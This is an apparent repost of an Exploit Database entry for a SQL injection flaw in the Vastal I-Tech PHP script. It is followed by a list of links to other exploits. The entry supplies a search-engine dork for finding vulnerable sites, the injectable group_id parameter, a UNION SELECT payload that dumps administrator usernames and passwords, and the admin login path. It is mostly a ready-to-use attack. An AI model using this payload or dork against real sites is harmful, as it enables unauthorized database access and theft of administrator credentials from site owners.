Vastal I-Tech – SQL Injection

Exploit Database
11 阅读

作者： HELLBOY

日期： 2010-06-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12845/

#######################################################
# IN THE NAME OF GOD
#
# Vastal I-Tech SQL Injection Vulnerability
#
# Author : HELLBOY
#
# Tested on Lunix
#
# CVE: N/A
#
# Email: A68.HELLBOY@GMAIL.COM
#
# Dork : inurl:"view_group.php?group_id="
########################################################
# Exploit :
# http://[site]/view_group.php?group_id={SQLI}
#
# EXAM: -1+union+select+group_concat(admin_user,0x3a,admin_password)+from+admin_users--
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################
# Greetz :
#All members of the ForumWwW.ASHIYANE.ORG & WwW.pars-p30.iR
#
#########################################################

last Exploits
Vastal I-Tech – SQL Injection的更多信息

Pointter PHP Content Management System – Unauthorized Privilege Escalation：
SiteDone Custom Edition 2.0 – SQL Injection / Cross-Site Scripting：
Clipperz Password Manager – ‘/backend/PHP/src/setup/rpc.php’ Remote Code Execution：
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)：
WordPress Plugin XCloner 3.1.0 – Cross-Site Request Forgery：
ManageEngine OpManager / Social IT Plus / IT360 – Multiple Vulnerabilities：
mojoportal – Multiple Vulnerabilities：
Openplanning 1.00 – Local File Inclusion / Remote File Inclusion：